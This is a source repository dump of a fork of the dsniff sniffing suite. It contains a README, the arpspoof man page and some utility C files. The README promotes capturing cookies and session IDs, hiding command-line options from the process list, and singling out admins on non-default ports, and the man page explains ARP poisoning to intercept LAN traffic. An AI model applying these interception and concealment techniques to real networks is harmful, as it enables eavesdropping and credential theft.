├── .github └── workflows │ └── static-release-push.yml ├── .gitignore ├── CHANGES ├── LICENSE ├── Makefile.in ├── README ├── README.md ├── TODO ├── acconfig.h ├── arp.c ├── arp.h ├── arpspoof.8 ├── arpspoof.c ├── asn1.c ├── asn1.h ├── base64.c ├── base64.h ├── buf.c ├── buf.h ├── config.h.in ├── configure ├── configure.ac ├── crc32.c ├── crc32.h ├── debian ├── README.Debian ├── README.source ├── changelog ├── control ├── copyright ├── docs ├── gbp.conf ├── patches │ ├── 01_time.h.patch │ ├── 02_mailsnarf_corrupt.patch │ ├── 03_pcap_read_dump.patch │ ├── 04_multiple_intf.patch │ ├── 05_amd64_fix.patch │ ├── 06_urlsnarf_zeropad.patch │ ├── 07_libnet_1.1.patch │ ├── 08_openssl-0.9.8.patch │ ├── 09_sysconf_clocks.patch │ ├── 10_urlsnarf_escape.patch │ ├── 11_string_header.patch │ ├── 12_arpa_inet_header.patch │ ├── 13_pop_with_version.patch │ ├── 14_obsolete_time.patch │ ├── 15_checksum_libnids.patch │ ├── 16_TDS_decoder.patch │ ├── 17_checksum.patch │ ├── 18_sshcrypto.patch │ ├── 19_rewrite-and-modernize-POP-decoder.patch │ ├── 20_debian_dirs.patch │ ├── 21_msgsnarf_segfault.patch │ ├── 22_handlepp.patch │ ├── 23_urlsnarf_timestamp.patch │ ├── 24_Fix-OpenSSL1.1.0-Build.patch │ ├── 25_fix-spelling-errors.patch │ ├── 26_arpspoof-add-r-switch-to-poison-both-directions.patch │ ├── 27_arpspoof-allow-use-of-of-multiple-targets.patch │ ├── 28_arpspoof-allow-selection-of-source-hw-address.patch │ ├── 29_libnet_name2addr4.patch │ ├── 30_pntohl_shift.patch │ ├── 31_sysconf_clocks.patch │ ├── 32_rpc_segfault.patch │ ├── 33_sshcrypto_DES.patch │ ├── 34_fix-parallel-FTBFS.patch │ ├── 35_Add_CPPFLAGS.patch │ ├── 36_implicit_declarations.patch │ ├── 37_fix-lib-and-share-dirs.patch │ ├── 38_fix-pcap_init.patch │ ├── 39_libtirpc.patch │ └── series ├── rules ├── salsa-ci.yml ├── source │ └── format └── watch ├── decode.c ├── decode.h ├── decode_aim.c ├── decode_citrix.c ├── decode_cvs.c ├── decode_ftp.c ├── decode_hex.c ├── decode_http.c ├── decode_icq.c ├── decode_imap.c ├── decode_irc.c ├── decode_ldap.c ├── decode_mmxp.c ├── decode_mountd.c ├── decode_napster.c ├── decode_nntp.c ├── decode_oracle.c ├── decode_ospf.c ├── decode_pcanywhere.c ├── decode_pop.c ├── decode_portmap.c ├── decode_postgresql.c ├── decode_pptp.c ├── decode_rip.c ├── decode_rlogin.c ├── decode_smb.c ├── decode_smtp.c ├── decode_sni.c ├── decode_sniffer.c ├── decode_snmp.c ├── decode_socks.c ├── decode_ssh.c ├── decode_tds.c ├── decode_telnet.c ├── decode_vrrp.c ├── decode_x11.c ├── decode_yp.c ├── dnsspoof.8 ├── dnsspoof.c ├── dnsspoof.hosts ├── dsniff.8 ├── dsniff.c ├── dsniff.magic ├── dsniff.services ├── dsniff_magic.h ├── dsniff_services.h ├── env2argv.c ├── env2argv.h ├── filesnarf.8 ├── filesnarf.c ├── hex.c ├── hex.h ├── install-sh ├── macof.8 ├── macof.c ├── magic.c ├── magic.h ├── mailsnarf.8 ├── mailsnarf.c ├── missing ├── dirname.c ├── dummy.c ├── err.c ├── err.h ├── ethers.c ├── libgen.h ├── md5.c ├── md5.h ├── memcmp.c ├── strlcat.c ├── strlcat.h ├── strlcpy.c ├── strlcpy.h ├── strsep.c └── sys │ └── queue.h ├── mount.c ├── mount.h ├── mount.x ├── msgsnarf.8 ├── msgsnarf.c ├── nfs_prot.c ├── nfs_prot.h ├── nfs_prot.x ├── options.h ├── pathnames.h ├── pcaputil.c ├── pcaputil.h ├── record.c ├── record.h ├── remote.c ├── rpc.c ├── rpc.h ├── ssh.c ├── ssh.h ├── sshcrypto.c ├── sshcrypto.h ├── sshmitm.8 ├── sshmitm.c ├── sshow.8 ├── sshow.c ├── tcp_raw.c ├── tcp_raw.h ├── tcpkill.8 ├── tcpkill.c ├── tcpnice.8 ├── tcpnice.c ├── trigger.c ├── trigger.h ├── urlsnarf.8 ├── urlsnarf.c ├── vroot.h ├── webmitm.8 ├── webmitm.c ├── webspy.8 └── webspy.c /.gitignore: -------------------------------------------------------------------------------- 1 | dsniff-*.tar.gz 2 | dsniff-*/ 3 | info.txt 4 | **/.DS_Store 5 | Makefile 6 | config.* 7 | *.a 8 | *.cache 9 | *.dat 10 | dsniff 11 | arpspoof 12 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Copyright (c) 1999, 2000 Dug Song 3 | All rights reserved, all wrongs reversed. 4 | 5 | Redistribution and use in source and binary forms, with or without 6 | modification, are permitted provided that the following conditions 7 | are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright 10 | notice, this list of conditions and the following disclaimer. 11 | 2. Redistributions in binary form must reproduce the above copyright 12 | notice, this list of conditions and the following disclaimer in the 13 | documentation and/or other materials provided with the distribution. 14 | 3. The name of author may not be used to endorse or promote products 15 | derived from this software without specific prior written permission. 16 | 17 | THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 18 | INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 19 | AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 20 | THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 23 | OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 24 | WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 26 | ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | 28 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Resurrection and enhancements of [Dug Song's](https://en.wikipedia.org/wiki/W00w00) all-time-classic network sniffer: 2 | 3 | * Hides the command line options (`ENV_ARGS=`) from the process list (`ps`). 4 | * Show Banners (`-v`). 5 | * HTTP parsing improvements & Cookie logging. 6 | * No duplicates: Reports each result only once. 7 | * Stand-alone & static binary (no need for dsniff.magic/dsniff.services) 8 | * Deep-Packet-Inspection (`-m`). Port agnostic. 9 | 10 | 11 | Download the [Pre Compiled Static Binary](https://github.com/hackerschoice/dsniff/releases/latest) for Linux, FreeBSD and OpenBSD. 12 | 13 | ```sh 14 | curl -SsfL "https://github.com/hackerschoice/dsniff/releases/latest/download/dsniff_linux-$(uname -m)" -o dsniff 15 | ``` 16 | 17 | Run (example): 18 | ```sh 19 | export ENV_ARGS="-i eth0 -v -m not port 443" # hide options from the process list 20 | ./dsniff 21 | ``` 22 | 23 | The reason why I prefer dsniff over most others: 24 | 1. The results give a quick overview who/where SSL/SSH is being used. 25 | 1. It logs Cookies and Session IDs. 26 | 1. It shows plaintext HTTP `Location: ` redirects to HTTPS. 27 | 1. It shows WireGuard or SSH on non-default ports (like port 31337). Those tend to be worthy admins. 28 | 29 | ![dsniff-thc-screenshot](https://github.com/hackerschoice/dsniff/assets/5938498/d3eeb16c-dd64-41f6-b839-ca7a70e34778) 30 | 31 | Compile: 32 | ```sh 33 | ./configure --enable static && make dsniff 34 | ``` 35 | 36 | ### Useful parameters: 37 | `-C` - Force Color [default is to show color on TTY only] 38 | `-P` - Use promisc mode 39 | `-v` - Show banners (SNI, SSH, HTTP, Cookies, ...) 40 | `-m` - Detect protocol regardless of the port (e.g ssh on port 222 etc). 41 | 42 | Compare [original](https://packages.debian.org/source/unstable/dsniff): [Diff](https://github.com/hackerschoice/dsniff/compare/orig...main) 43 | Original [README](README) 44 | 45 | --- 46 | Similar tools: 47 | * https://github.com/lgandx/PCredz 48 | * https://github.com/DanMcInerney/net-creds 49 | 50 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | $Id: TODO,v 1.2 2000/12/02 06:29:30 dugsong Exp $ 2 | 3 | - finish conversion to buf interface 4 | 5 | - rework half-duplex tcp_raw reassembly, for *snarf [-c] 6 | 7 | - NTLM handling in telnet, FTP, HTTP, SMB, NNTP, etc. non-trivial 8 | since dsniff only examines client traffic :-/ 9 | 10 | - arpspoof [host ...] 11 | 12 | - more protocols: atalk, MAPI, etc.? 13 | 14 | - reverse more of AOL's OSCAR protocol for dsniff and msgsnarf 15 | 16 | -------------------------------------------------------------------------------- /acconfig.h: -------------------------------------------------------------------------------- 1 | /* Define to 'uint32_t' if doesn't define. */ 2 | #undef u_int32_t 3 | 4 | /* Define to 'uint64_t' if doesn't define. */ 5 | #undef u_int64_t 6 | 7 | /* Define to 'u_int32_t' if doesn't define. */ 8 | #undef in_addr_t 9 | 10 | /* Define if you have the header file. */ 11 | #undef HAVE_DB_H 12 | 13 | /* Define if you have the header file. */ 14 | #undef HAVE_DB_185_H 15 | 16 | /* Should be in , *sigh* */ 17 | #undef HAVE_MINMAX 18 | #ifndef HAVE_MINMAX 19 | #define MIN(a,b) (((a)<(b))?(a):(b)) 20 | #define MAX(a,b) (((a)>(b))?(a):(b)) 21 | #endif 22 | 23 | -------------------------------------------------------------------------------- /arp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * arp.c 3 | * 4 | * ARP cache routines. 5 | * 6 | * Copyright (c) 1999 Dug Song 7 | * 8 | * $Id: arp.c,v 1.8 2001/03/15 08:32:58 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | #include 16 | #ifdef BSD 17 | #include 18 | #include 19 | #include 20 | #ifdef __FreeBSD__ /* XXX */ 21 | #define ether_addr_octet octet 22 | #endif 23 | #else /* !BSD */ 24 | #include 25 | #ifndef __linux__ 26 | #include 27 | #endif 28 | #endif /* !BSD */ 29 | #include 30 | #include 31 | #include 32 | #include 33 | 34 | #include 35 | #include 36 | #include 37 | #include 38 | 39 | #include "arp.h" 40 | 41 | #ifdef BSD 42 | int 43 | arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf) 44 | { 45 | int mib[6]; 46 | size_t len; 47 | char *buf, *next, *end; 48 | struct rt_msghdr *rtm; 49 | struct sockaddr_inarp *sin; 50 | struct sockaddr_dl *sdl; 51 | 52 | mib[0] = CTL_NET; 53 | mib[1] = AF_ROUTE; 54 | mib[2] = 0; 55 | mib[3] = AF_INET; 56 | mib[4] = NET_RT_FLAGS; 57 | mib[5] = RTF_LLINFO; 58 | 59 | if (sysctl(mib, 6, NULL, &len, NULL, 0) < 0) 60 | return (-1); 61 | 62 | if ((buf = (char *)malloc(len)) == NULL) 63 | return (-1); 64 | 65 | if (sysctl(mib, 6, buf, &len, NULL, 0) < 0) { 66 | free(buf); 67 | return (-1); 68 | } 69 | end = buf + len; 70 | 71 | for (next = buf ; next < end ; next += rtm->rtm_msglen) { 72 | rtm = (struct rt_msghdr *)next; 73 | sin = (struct sockaddr_inarp *)(rtm + 1); 74 | sdl = (struct sockaddr_dl *)(sin + 1); 75 | 76 | if (sin->sin_addr.s_addr == ip && sdl->sdl_alen) { 77 | memcpy(ether->ether_addr_octet, LLADDR(sdl), 78 | ETHER_ADDR_LEN); 79 | free(buf); 80 | return (0); 81 | } 82 | } 83 | free(buf); 84 | 85 | return (-1); 86 | } 87 | 88 | #else /* !BSD */ 89 | 90 | #ifndef ETHER_ADDR_LEN /* XXX - Solaris */ 91 | #define ETHER_ADDR_LEN 6 92 | #endif 93 | 94 | int 95 | arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* lif) 96 | { 97 | int sock; 98 | struct arpreq ar; 99 | struct sockaddr_in *sin; 100 | 101 | memset((char *)&ar, 0, sizeof(ar)); 102 | #ifdef __linux__ 103 | strncpy(ar.arp_dev, lif, strlen(lif)); 104 | #endif 105 | sin = (struct sockaddr_in *)&ar.arp_pa; 106 | sin->sin_family = AF_INET; 107 | sin->sin_addr.s_addr = ip; 108 | 109 | if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { 110 | return (-1); 111 | } 112 | if (ioctl(sock, SIOCGARP, (caddr_t)&ar) == -1) { 113 | close(sock); 114 | return (-1); 115 | } 116 | close(sock); 117 | memcpy(ether->ether_addr_octet, ar.arp_ha.sa_data, ETHER_ADDR_LEN); 118 | 119 | return (0); 120 | } 121 | 122 | #endif /* !BSD */ 123 | -------------------------------------------------------------------------------- /arp.h: -------------------------------------------------------------------------------- 1 | /* 2 | * arp.h 3 | * 4 | * ARP cache routines. 5 | * 6 | * Copyright (c) 1999 Dug Song 7 | * 8 | * $Id: arp.h,v 1.1 2001/03/15 08:27:08 dugsong Exp $ 9 | */ 10 | 11 | #ifndef _ARP_H_ 12 | #define _ARP_H_ 13 | 14 | int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf); 15 | 16 | #endif /* _ARP_H_ */ 17 | -------------------------------------------------------------------------------- /arpspoof.8: -------------------------------------------------------------------------------- 1 | .TH ARPSPOOF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | arpspoof 6 | \- 7 | intercept packets on a switched LAN 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBarpspoof\fR [\fB\-i \fIinterface\fR] [\fB\-c \fIown|host|both\fR] [\fB\-t \fItarget\fR] [\fB\-r\fR] \fIhost\fR 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBarpspoof\fR redirects packets from a target host (or all hosts) 17 | on the LAN intended for another host on the LAN by forging ARP 18 | replies. This is an extremely effective way of sniffing traffic on a 19 | switch. 20 | .LP 21 | Kernel IP forwarding (or a userland program which accomplishes the 22 | same, e.g. fragrouter(8)) must be turned on ahead of time. 23 | .SH OPTIONS 24 | .IP "\fB-i \fIinterface\fR" 25 | Specify the interface to use. 26 | .IP "\fB-c \fIown|host|both\fR" 27 | Specify which hardware address t use when restoring the arp configuration; 28 | while cleaning up, packets can be send with the own address as well as with 29 | the address of the host. Sending packets with a fake hw address can disrupt 30 | connectivity with certain switch/ap/bridge configurations, however it works 31 | more reliably than using the own address, which is the default way arpspoof 32 | cleans up afterwards. 33 | .IP "\fB-t \fItarget\fR" 34 | Specify a particular host to ARP poison (if not specified, all hosts 35 | on the LAN). Repeat to specify multiple hosts. 36 | .IP "\fB\-r\fR" 37 | Poison both hosts (host and target) to capture traffic in both directions. 38 | (only valid in conjuntion with \-t) 39 | .IP \fIhost\fR 40 | Specify the host you wish to intercept packets for (usually the local 41 | gateway). 42 | .SH "SEE ALSO" 43 | dsniff(8), fragrouter(8) 44 | .SH AUTHOR 45 | .na 46 | .nf 47 | Dug Song 48 | -------------------------------------------------------------------------------- /asn1.c: -------------------------------------------------------------------------------- 1 | /* 2 | * asn1.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: asn1.c,v 1.4 2001/03/15 08:32:58 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | #include 13 | 14 | #include 15 | 16 | #include "buf.h" 17 | #include "asn1.h" 18 | 19 | int 20 | asn1_type(buf_t buf) 21 | { 22 | u_char c; 23 | 24 | if (buf_get(buf, &c, 1) != 1) 25 | return (-1); 26 | 27 | return (c & 0x1f); 28 | } 29 | 30 | int 31 | asn1_len(buf_t buf) 32 | { 33 | u_char *p, c; 34 | int num; 35 | 36 | if (buf_get(buf, &c, 1) != 1) 37 | return (-1); 38 | 39 | if (c >= 128) { 40 | c &= ~128; 41 | p = buf_ptr(buf); 42 | 43 | if (buf_skip(buf, c) < 0) 44 | return (-1); 45 | 46 | switch (c) { 47 | case 1: 48 | num = *p; 49 | break; 50 | case 2: 51 | GETSHORT(num, p); 52 | break; 53 | case 3: 54 | p--; GETLONG(num, p); 55 | num &= 0xfff; 56 | break; 57 | case 4: 58 | GETLONG(num, p); 59 | break; 60 | default: 61 | return (-1); 62 | } 63 | } 64 | else num = c; 65 | 66 | return (num); 67 | } 68 | -------------------------------------------------------------------------------- /asn1.h: -------------------------------------------------------------------------------- 1 | /* 2 | * asn1.h 3 | * 4 | * ASN.1 routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: asn1.h,v 1.3 2001/03/15 08:33:05 dugsong Exp $ 9 | */ 10 | 11 | #ifndef ASN1_H 12 | #define ASN1_H 13 | 14 | #define ASN1_INTEGER 2 15 | #define ASN1_STRING 4 16 | #define ASN1_SEQUENCE 16 17 | 18 | int asn1_type(buf_t buf); 19 | int asn1_len(buf_t buf); 20 | 21 | #endif /* ASN1_H */ 22 | 23 | -------------------------------------------------------------------------------- /base64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * base64.h 3 | * 4 | * Base-64 routines. 5 | * 6 | * $Id: base64.h,v 1.2 2001/03/15 08:33:05 dugsong Exp $ 7 | */ 8 | 9 | #ifndef BASE64_H 10 | #define BASE64_H 11 | 12 | int base64_pton(char const *, u_char *, size_t); 13 | 14 | #endif /* BASE64_H */ 15 | 16 | -------------------------------------------------------------------------------- /buf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * buf.h 3 | * 4 | * Buffer manipulation routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: buf.h,v 1.6 2001/03/15 08:33:05 dugsong Exp $ 9 | */ 10 | 11 | #ifndef BUF_H 12 | #define BUF_H 13 | 14 | typedef struct buf { 15 | u_char *base; 16 | int size; 17 | int offset; 18 | int end; 19 | } *buf_t; 20 | 21 | /* Initialize buffer. */ 22 | void buf_init(buf_t buf, u_char *data, int len); 23 | 24 | /* Allocate buffer. */ 25 | buf_t buf_new(int size); 26 | 27 | /* Free buffer. */ 28 | void buf_free(buf_t buf); 29 | 30 | /* Return pointer to buffer data. */ 31 | #define buf_ptr(b) ((b)->base + (b)->offset) 32 | 33 | /* Return length of buffer data. */ 34 | #define buf_len(b) ((b)->end - (b)->offset) 35 | 36 | /* Return remaining length of unused buffer. */ 37 | #define buf_left(b) ((b)->size - (b)->offset) 38 | 39 | /* Return size of buffer. */ 40 | #define buf_size(b) ((b)->size) 41 | 42 | /* Return offset in buffer. */ 43 | #define buf_tell(b) ((b)->offset) 44 | 45 | /* Reposition buffer offset. */ 46 | int buf_seek(buf_t buf, int offset, int whence); 47 | #define buf_skip(b, l) buf_seek(b, l, SEEK_CUR) 48 | #define buf_rewind(b) buf_seek(b, 0, SEEK_SET) 49 | 50 | /* Read from buffer. */ 51 | int buf_get(buf_t buf, void *dst, int len); 52 | 53 | /* Write to buffer. */ 54 | int buf_put(buf_t buf, void *src, int len); 55 | int buf_putf(buf_t buf, const char *fmt, ...); 56 | 57 | /* Finalize buffer. */ 58 | void buf_end(buf_t buf); 59 | 60 | /* Locate byte string in buffer. */ 61 | int buf_index(buf_t buf, void *ptr, int len); 62 | int buf_rindex(buf_t buf, void *ptr, int len); 63 | 64 | /* Compare buffer to byte string. */ 65 | int buf_cmp(buf_t buf, void *ptr, int len); 66 | 67 | /* Tokenize buffer, like strtok(3). */ 68 | buf_t buf_tok(buf_t buf, void *sep, int len); 69 | 70 | /* Get a sub-buffer from buffer. */ 71 | buf_t buf_getbuf(buf_t buf, int offset, int len); 72 | 73 | /* Get a word from buffer. */ 74 | buf_t buf_getword(buf_t buf, void *sep, int len); 75 | 76 | /* Convert buffer to allocated string. */ 77 | char * buf_strdup(buf_t buf); 78 | 79 | /* ASCII string test. */ 80 | int buf_isascii(buf_t buf); 81 | 82 | #endif /* BUF_H */ 83 | -------------------------------------------------------------------------------- /config.h.in: -------------------------------------------------------------------------------- 1 | /* config.h.in. Generated automatically from configure.in by autoheader. */ 2 | 3 | /* Define to empty if the keyword does not work. */ 4 | #undef const 5 | 6 | /* Define if you have the strftime function. */ 7 | #undef HAVE_STRFTIME 8 | 9 | /* Define as the return type of signal handlers (int or void). */ 10 | #undef RETSIGTYPE 11 | 12 | /* Define to `unsigned' if doesn't define. */ 13 | #undef size_t 14 | 15 | /* Define if you have the ANSI C header files. */ 16 | #undef STDC_HEADERS 17 | 18 | /* Define if your declares struct tm. */ 19 | #undef TM_IN_SYS_TIME 20 | 21 | /* Define if the X Window System is missing or not being used. */ 22 | #undef X_DISPLAY_MISSING 23 | 24 | /* Define to 'uint32_t' if doesn't define. */ 25 | #undef u_int32_t 26 | 27 | /* Define to 'uint64_t' if doesn't define. */ 28 | #undef u_int64_t 29 | 30 | /* Define to 'u_int32_t' if doesn't define. */ 31 | #undef in_addr_t 32 | 33 | /* Define if you have the header file. */ 34 | #undef HAVE_DB_H 35 | 36 | /* Define if you have the header file. */ 37 | #undef HAVE_DB_185_H 38 | 39 | /* Should be in , *sigh* */ 40 | #undef HAVE_MINMAX 41 | #ifndef HAVE_MINMAX 42 | #define MIN(a,b) (((a)<(b))?(a):(b)) 43 | #define MAX(a,b) (((a)>(b))?(a):(b)) 44 | #endif 45 | 46 | /* Define if you have the MD5Update function. */ 47 | #undef HAVE_MD5UPDATE 48 | 49 | /* Define if you have the dirname function. */ 50 | #undef HAVE_DIRNAME 51 | 52 | /* Define if you have the ether_ntoa function. */ 53 | #undef HAVE_ETHER_NTOA 54 | 55 | /* Define if you have the gethostname function. */ 56 | #undef HAVE_GETHOSTNAME 57 | 58 | /* Define if you have the socket function. */ 59 | #undef HAVE_SOCKET 60 | 61 | /* Define if you have the strdup function. */ 62 | #undef HAVE_STRDUP 63 | 64 | /* Define if you have the strlcat function. */ 65 | #undef HAVE_STRLCAT 66 | 67 | /* Define if you have the strlcpy function. */ 68 | #undef HAVE_STRLCPY 69 | 70 | /* Define if you have the strsep function. */ 71 | #undef HAVE_STRSEP 72 | 73 | /* Define if you have the strstr function. */ 74 | #undef HAVE_STRSTR 75 | 76 | /* Define if you have the warnx function. */ 77 | #undef HAVE_WARNX 78 | 79 | /* Define if you have the header file. */ 80 | #undef HAVE_ERR_H 81 | 82 | /* Define if you have the header file. */ 83 | #undef HAVE_FCNTL_H 84 | 85 | /* Define if you have the header file. */ 86 | #undef HAVE_LIBGEN_H 87 | 88 | /* Define if you have the header file. */ 89 | #undef HAVE_NET_IF_TUN_H 90 | 91 | /* Define if you have the header file. */ 92 | #undef HAVE_SYS_IOCTL_H 93 | 94 | /* Define if you have the header file. */ 95 | #undef HAVE_SYS_QUEUE_H 96 | 97 | /* Define if you have the header file. */ 98 | #undef HAVE_UNISTD_H 99 | 100 | /* Define if you have the nsl library (-lnsl). */ 101 | #undef HAVE_LIBNSL 102 | 103 | /* Define if you have the resolv library (-lresolv). */ 104 | #undef HAVE_LIBRESOLV 105 | 106 | /* Define if you have the rpcsvc library (-lrpcsvc). */ 107 | #undef HAVE_LIBRPCSVC 108 | 109 | /* Define if you have the socket library (-lsocket). */ 110 | #undef HAVE_LIBSOCKET 111 | -------------------------------------------------------------------------------- /crc32.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include "crc32.h" 4 | 5 | /* 6 | * Table of CRCs of all 8-bit messages. 7 | */ 8 | static const uint32_t CRC32_Table[256] = 9 | { 10 | 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 11 | 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 12 | 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 13 | 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 14 | 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 15 | 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 16 | 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 17 | 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 18 | 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 19 | 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 20 | 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 21 | 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 22 | 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 23 | 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 24 | 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 25 | 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 26 | 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 27 | 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 28 | 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 29 | 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 30 | 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 31 | 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 32 | 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 33 | 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 34 | 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 35 | 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 36 | 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 37 | 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 38 | 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 39 | 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 40 | 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 41 | 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 42 | 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 43 | 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 44 | 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 45 | 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 46 | 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 47 | 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 48 | 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 49 | 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 50 | 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 51 | 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 52 | 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 53 | 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 54 | 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 55 | 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 56 | 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 57 | 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 58 | 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 59 | 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 60 | 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 61 | 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 62 | 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 63 | 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 64 | 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 65 | 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 66 | 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 67 | 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 68 | 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 69 | 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 70 | 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 71 | 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 72 | 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 73 | 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d 74 | }; 75 | 76 | /* 77 | * Update a running CRC with the bytes 78 | * buf[0..len-1]--the CRC should be 79 | * initialized to all 1's. 80 | */ 81 | uint32_t 82 | crc32_update(const void *buf, size_t len, uint32_t crc) { 83 | const uint8_t *b = buf; 84 | size_t i; 85 | for (i = 0; i < len; i++) { 86 | crc = CRC32_Table[(crc ^ *b++) & 0xff] ^ (crc >> 8); 87 | } 88 | return ~crc; 89 | } 90 | 91 | /* 92 | * Return the CRC of the bytes buf[0..len-1]. 93 | */ 94 | uint32_t 95 | crc32(const void *buf, size_t len) { 96 | return crc32_update(buf, len, CRC32_INITIAL); 97 | } 98 | -------------------------------------------------------------------------------- /crc32.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | #ifndef __DS_CRC32_H__ 4 | #define __DS_CRC32_H__ 1 5 | 6 | #define CRC32_INITIAL ((uint32_t)0xffffffff) 7 | #define CRC32_INITIAL_STATE (~CRC32_INITIAL) 8 | 9 | #include 10 | #include 11 | 12 | 